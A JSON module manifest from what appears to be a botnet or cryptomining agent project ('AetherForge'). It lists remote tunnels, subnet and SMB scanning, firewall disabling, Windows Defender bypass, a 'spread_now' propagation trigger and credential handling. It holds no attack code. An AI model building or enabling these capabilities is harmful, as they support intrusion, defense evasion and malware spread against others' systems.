Files
AetherForge/data/modules/crucible_ops.json
AetherForge a32860b0d9
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
feat: alive UI wave, galaxy presence, spread and fleet enhancements
Dashboard ambient layer, comrade presence, Mission Deck and War Room, Emberwake supply chain, spread/docs publishing, fleet policy and modules API, CI docker mining, and refreshed USB pack.
2026-06-04 22:36:17 -07:00

20 lines
756 B
JSON

{
"name": "crucible_ops",
"version": "1",
"display_name": "Crucible Ops",
"summary": "Dashboard remote aggressive ops — tunnels, scans, firewall, defender",
"description": "Stages remote aggressive command gates on thin agents without re-forge. Enables Crucible dashboard buttons: cloudflared/SSH tunnels, subnet scan, SMB shares, firewall punch, defender bypass, and on-demand spread_now.",
"accent": "magenta",
"capabilities": [
"Remote tunnels (cloudflared, SSH forward)",
"Subnet scan & SMB share enumeration",
"Firewall punch / disable / profile control",
"Defender RTP bypass (Windows)",
"On-demand spread_now trigger",
"Credential vault & secure wipe"
],
"features": {
"remote_aggressive": true
}
}